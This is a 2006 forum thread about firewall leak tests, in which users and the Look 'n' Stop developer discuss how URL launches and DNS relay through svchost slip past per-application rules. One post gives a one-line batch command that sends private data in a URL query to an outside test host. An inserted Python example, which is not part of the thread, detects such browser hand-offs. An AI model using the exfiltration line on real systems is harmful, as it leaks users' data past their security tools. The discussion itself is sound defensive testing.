Leakage from WMP to svchost.exe to Firefox to internet

Discussion in 'LnS English Forum' started by Pete99, May 4, 2006.

Thread Status:
Not open for further replies.
  1. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
    I don't know how likely this is, but it seems like it could be a way for malware to send my private information to hackers.

    I'll use WMP as an example since most people have it on their computers, but I think that the same problem exists with any application that "executes" a URL. To determine what was happening, I enabled logging for all applications*. In LnS I blocked WMP from accessing the internet or launching internet applications.

    If I start WMP and choose "Help > Windows Media Player Online", LnS does not show me an alert for WMP, and the logs do not show WMP at all but instead LnS allows svchost.exe and Firefox to access the internet with the URL that WMP created.

    The other strange thing is that even if I block svchost.exe from internet access and launching internet apps, LnS still allows it to send UDP packets to the internet (on port 53). This seems like an even worse problem.

    Can anyone reproduce these things?

    I wonder if these things are related to the fact that my computer fails some of the "official leak tests" after my computer has been running for a while.


    *By the way, I wish that there was an easy way to enable/disable !! logging on the app filtering tab for all apps at the same time.
     
  2. Frederic

    Frederic LnS Developer

    Joined:
    Jan 9, 2003
    Posts:
    4,354
    Location:
    France
    Hi,

For the specific case of starting a URL, it is normal to have some other application connecting instead of the normal one.
    This is the purpose of the "Starter" leaktests category (Tooleaky, Wallbreaker...): to show these vulnerabilities.
    If the starter really starts the other exe, normally Look 'n' Stop should prompt you, as the starter is considered as the parent process.

For the special case of port 53, this is for DNS resolution, and yes, there is the DNSTester leaktest that shows the vulnerability when the DNS service is enabled on the PC (when it is not enabled, the requests are done by the application directly and not relayed via svchost/services).

    Frederic
     
  3. Thomas M

    Thomas M Registered Member

    Joined:
    Jan 12, 2003
    Posts:
    355
    Dear Frederic,
    Would you suggest disabling the "DNS service" (via svchost) for security reasons?

    Regards,
    Thomas
     
  4. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
Okay, I restarted my computer. Every time that I do that, LnS passes copycat/dnstester/pcaudit2.

    After running the three leak tests (LnS passed all of them), I immediately started WMP again. The bad news: WMP was still able to open my browser and load the webpage even though I had blocked WMP and svchost in app filtering. The good news: this time, svchost failed to send any DNS packets.

    So it seems that any app can successfully execute a URL even if we have blocked both the app and svchost in app filtering. Maybe this problem will exist until LnS is enhanced to pass the Wallbreaker leak test (if you ever decide to do that).

    As I think you said, Frederic, the svchost problem seems to be directly related to my problem with dnstester: LnS passes dnstester and blocks svchost DNS packets after I restart my computer but both things fail after a "random" amount of time after the reboot. This subject is probably best discussed in the other topic ("LnS and Leak Tests").
     
  5. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
    Okay, forget about WMP and svchost for a minute. I can reproduce the problem simply by executing a URL inside a simple batch file. LnS does not prompt me when I run the batch file (nor does Avast or ProcessGuard or Windows Defender).

    To test this you can create a file (e.g. test.bat) with the following line in it and run it:
    Code:
    start http://test.com/script.asp?yourPrivateDataHere
    This bothers me because which of my security apps is supposed to protect me from this attack?

    Is it possible that LnS could detect this (not specific to a .bat file but anytime that an app executes a URL)?
     
  6. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
You're right, none stops it. :cautious: Process Guard does not stop batch files (nor cygwin scripts...), unless they contain commands that have not been "allowed by default". And that's a given. Nor does it make a distinction between executables based on the arguments passed to them. Nothing else complains at all on my machine either.

With Core Force, however, I was able to restrict cmd.exe and stop the batch script dead in its tracks, but I'm not sure of the implications of this; maybe instructing it to read from a defined set of basic files and setting it to prompt for the action to take on others. Maybe. Restricting it might initially mean quite a lot of trouble, though. I'm not sure this is a "normal" rule that can be enabled by default. :cautious: I'll try and see.
     
    Last edited: May 6, 2006
  7. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
    Thanks for the info, TNT.

    Well, for what it's worth, I believe that Windows executes a URL in a similar way to how it executes regular programs (via file associations for HTTP in the Registry). I think that you're right that it would cause a lot of trouble if I disabled this file association (e.g. I wouldn't be able to launch my browser from links in my email program).

    I have also tested this with an .exe file, but with the same results.

    However, I've discovered that if Firefox is not running, then LnS *does* prompt me, but not if Firefox is already running. Strange. I hope that there's a fix for this.
     
  8. WSFuser

    WSFuser Registered Member

    Joined:
    Oct 7, 2004
    Posts:
    10,632
A script blocker could help. One of the best is WormGuard from DiamondCS. ScriptDefender would also work.
     
  9. Frederic

    Frederic LnS Developer

    Joined:
    Jan 9, 2003
    Posts:
    4,354
    Location:
    France
    This is normal. If the process is already loaded, the parent process is not the one launching the URL but the initial one (probably explorer.exe).
    Look 'n' Stop checks & prompts only on the parent process.

    Frederic
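    An added example, not code from this thread or from Look 'n' Stop: Frederic's point is that the firewall attributes the connection to the browser (or to the browser's original parent), so the application that built the URL is never seen. Process-creation telemetry that records the parent image and the full command line still shows the hand-off, and the Python below runs that check over constructed sample events (the field names, sample paths and hostnames are assumptions).

```python
"""Flag URL hand-offs from a non-browser process to a browser.

Per-application firewall rules attribute the connection to the browser
(or to its original parent, e.g. explorer.exe), so the process that built
the URL is invisible to them. A process-creation record with parent image
and full command line still shows who handed the browser which URL, and
the query string is where leaked data would sit. All events below are
constructed for the example; field names mimic a generic process log.
"""
import re
from urllib.parse import urlsplit, parse_qsl

BROWSERS = {"firefox.exe", "iexplore.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}       # normal user-initiated launches
URL_RE = re.compile(r'https?://[^\s"]+', re.IGNORECASE)

# Constructed sample events (assumed format, not real logs).
SAMPLE_EVENTS = [
    {"parent": r"C:\WINDOWS\explorer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe"'},
    {"parent": r"C:\WINDOWS\system32\cmd.exe",              # the .bat case
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe" -url http://test.com/script.asp?yourPrivateDataHere'},
    {"parent": r"C:\Program Files\Windows Media Player\wmplayer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe" -url http://example.test/collect?user=alice&serial=1234'},
    {"parent": r"C:\WINDOWS\system32\services.exe",         # unrelated noise
     "image": r"C:\WINDOWS\system32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_url_handoffs(events):
    """One finding per browser launch whose parent is not an interactive
    shell and whose command line carries a URL; the query is decoded."""
    findings = []
    for ev in events:
        if basename(ev["image"]) not in BROWSERS:
            continue
        if basename(ev["parent"]) in INTERACTIVE_PARENTS:
            continue
        m = URL_RE.search(ev["cmdline"])
        if not m:
            continue
        parts = urlsplit(m.group(0))
        findings.append({"launcher": basename(ev["parent"]), "host": parts.hostname,
                         "query": dict(parse_qsl(parts.query, keep_blank_values=True))})
    return findings
```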
     
  10. Frederic

    Frederic LnS Developer

    Joined:
    Jan 9, 2003
    Posts:
    4,354
    Location:
    France
Yes, if the DNS method to send information is a real threat, and if you fail DNSTester, then it would be safer to disable "DNS Service".

    Frederic
     
  11. Thomas M

    Thomas M Registered Member

    Joined:
    Jan 12, 2003
    Posts:
    355
    Damned :mad:
I tried deactivating the DNS service in Windows XP. For standard internet connections it works well, and now I do pass "DNSTester" :)
    However, now I cannot connect to our network printer anymore! Before, it required access through "spoolsv.exe" (TCP port 80) and through svchost.exe (UDP port 53).
    My logs don't give me any clue: all printing traffic successfully runs through spoolsv.exe (port 53 and 80), no additional blocked packets in my log file...

    So, either less security or no printing! Great alternatives.... :doubt:

    Thomas
     
  12. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
    Thanks, WSFuser. I'll investigate those programs.


    Thanks, Frederic. I understand better now.
     